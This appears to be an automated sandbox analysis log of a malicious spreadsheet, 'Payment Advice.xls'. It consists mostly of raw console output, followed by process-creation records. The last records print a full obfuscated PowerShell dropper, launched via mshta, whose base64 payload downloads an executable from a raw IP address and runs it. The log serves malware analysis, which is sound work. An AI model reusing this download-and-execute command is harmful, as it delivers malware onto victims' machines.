                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............!j.....o.xk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............!j.....o.xk......i.....(.P.............................l.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w.............!j.....o.xk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X.......m..........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............h...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............................(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............h...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............................(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............h...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......t.......|.......X.......$..........................s............h...............(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X.......<..........................s............h...............(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.X.......`..........................s............h....... .......(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X.......x..........................s............h...............(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............................(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............h...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............h.......$.......(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............h...............(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............................(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X.......,..........................s............h...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............h.......2.......(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X.......f..........................s............h...............(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s....................l.......(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............h...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....t.......|.......X..................................s............h...............(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......|.......X..................................s............h...............(...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......o..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................`.......&..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......>..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.`.......b..........................s............(....... .......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......z..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............(.......$.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......l..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s....................l.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`..................................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............(...............(...............
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................0.......................(.P.............$.......<........~......................................................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......&..........................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......2..........................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................<.......D..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......P..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<.......b..........................s............x....... .......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......n..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............x.......$.......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x.......2.......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s....................l.......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................<..................................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<......."..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............<..................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............t.......5..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............t.......A..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......H...............8.......\..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............8.......i..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8.......}..........................s.................... .......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............8.......P..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H.......................f..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............8.......u..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............8..................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H..................................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H..................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H..................................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H..................................................s....................l.......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............P..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....H...............P..................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....H...............P.......(..........................s............................8...............
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................0.'.........E.R.R.O.R.:. ...................8...............................................X.........................'.....
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................0.'.........E.R.R.O.(.P.....................8.......................................................j.......H.........'.....
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.x.......x.....0g......................0g......8g.......................3......................0g..............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................x.....}..w......x......................1......(.P.....@.......D.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P................x.......x.....}..w.............................1......(.P..............3........!.............@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....@.......D.......h...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....@.......D.......h...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...h.....9..l......g.....(.P.....@.......D............... .......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.V.i.C.e.c.R.e.D.e.n.T.I.a.l.d.E.p.L.O.y.m.e.n.t.(.P.....@.......D...............8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....@.......D...............8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...D...............F.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.....l.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.......}..w..............h.....9..l......g.....(.P.....@.......D.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................\..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................h..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................z..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n..........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s.................... .........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......$..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......7..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......C..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......a..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... .......v..........................s....................l.........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..................... ..................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......&..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......4..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......F..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......R..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......d..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......p..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@..................................s..............k..... .......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s..............k.....$.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............k.....2.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......8.......B..........................s....................l.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......8.......N..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............8.......8.......`..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......8.......l..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................<.+.........E.R.R.O.R.:. ...t.......@.......@.........................................................................+.....
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................<.+.........E.R.R.O.(.P.....t.......@.......@.......................................................j.......x.........+.....
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Payment Advice.xlsReversingLabs: Detection: 21%
                    Source: Payment Advice.xlsVirustotal: Detection: 25%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
